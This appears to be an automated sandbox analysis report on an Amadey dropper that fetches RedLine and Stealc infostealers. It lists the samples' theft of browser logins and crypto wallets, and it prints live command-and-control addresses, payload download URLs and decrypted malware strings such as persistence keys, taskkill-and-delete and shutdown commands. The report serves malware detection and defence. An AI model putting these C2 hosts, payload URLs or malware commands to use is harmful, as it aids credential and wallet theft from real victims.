Source: d34ebbe5f2.exe, 00000009.00000002.2649658650.00000000011F9000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: osUL+Program Manager
Source: d34ebbe5f2.exe, d34ebbe5f2.exe, 00000009.00000002.2649658650.00000000011F9000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: sUL+Program Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 5_2_008CD3E2 cpuid

5_2_008CD3E2

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085423001\xclient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085423001\xclient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 5_2_008CCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

5_2_008CCBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 5_2_008B65E0 LookupAccountNameA,

5_2_008B65E0

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: 9179bdeb47.exe, 00000007.00000003.2731421100.0000000008E4D000.00000004.00000020.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2731062601.0000000008E48000.00000004.00000020.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2931626474.0000000008E3D000.00000004.00000020.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2730842616.0000000008DC6000.00000004.00000020.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000003.2931822636.0000000008E48000.00000004.00000020.00020000.00000000.sdmp, 9179bdeb47.exe, 00000007.00000002.2957206106.0000000008E4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 5.2.skotes.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TxTPu961er.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2109937932.00000000008B1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2082141353.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2108421121.00000000008B1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.9179bdeb47.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2938227361.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2546762786.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2932155656.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9179bdeb47.exe PID: 6528, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000009.00000002.2649353368.0000000000E21000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2594977274.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2648771418.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d34ebbe5f2.exe PID: 4404, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 7.2.9179bdeb47.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.2546762786.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2932155656.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9179bdeb47.exe PID: 6528, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.9179bdeb47.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2938227361.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2546762786.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2932155656.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9179bdeb47.exe PID: 6528, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000009.00000002.2649353368.0000000000E21000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2594977274.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2648771418.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d34ebbe5f2.exe PID: 4404, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	12 Software Packing	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	326 System Information Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	971 Security Software Discovery	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	471 Virtualization/Sandbox Evasion	DCSync	471 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: http://185.215.113.43/Zu7JuNko/index.phpS	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php;.	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncoded?_U	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/e1dac8d9ea1e2feb1d830814c45ac5deb5a161a07ce93f	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpC	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpN	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/smirnov2626/random.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/l	Avira URL Cloud: Label: malware
Source: http://ecozessentials.com/e6cb1c8fc7cd1659.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php6(6	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php(	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpded#_I	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpt	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpz(J	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpy	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php5001	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/SQL_gulong1/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpq	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpUS	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpr	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf0GZ	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 7.2.9179bdeb47.exe.210000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}

Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: 185.215.113.43
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: S-%lu-
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: abc3bc1985
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: skotes.exe
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Startup
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: rundll32
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Programs
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: %USERPROFILE%
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: cred.dll
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: clip.dll
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: http://
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: https://
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: /quiet
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: /Plugins/
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: &unit=
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: shell32.dll
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: kernel32.dll
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: ProgramData\
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: AVAST Software
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Kaspersky Lab
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Panda Security
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Doctor Web
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: 360TotalSecurity
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Bitdefender
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Norton
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Sophos
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Comodo
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: WinDefender
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: 0123456789
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: ------
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: ?scr=1
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: ComputerName
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: -unicode-
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: VideoID
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: ProductName
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: CurrentBuild
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: rundll32.exe
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: "taskkill /f /im "
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: " && timeout 1 && del
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: && Exit"
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: " && ren
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Powershell.exe
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: shutdown -s -t 0
Source: 00000005.00000002.4512215175.00000000008B1000.00000040.00000001.01000000.00000008.sdmp	String decryptor: random

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49846 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.5:49885 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49921 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49862
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49954 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.5:49969 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49969 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49993 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49967 -> 91.202.233.244:80
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 103.84.89.222:33791 -> 192.168.2.5:49969
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49969 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 103.84.89.222:33791 -> 192.168.2.5:49969

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\tmp6E9C.tmp	ReversingLabs: Detection: 56%

Source: Malware configuration extractor	IPs: 185.215.113.43
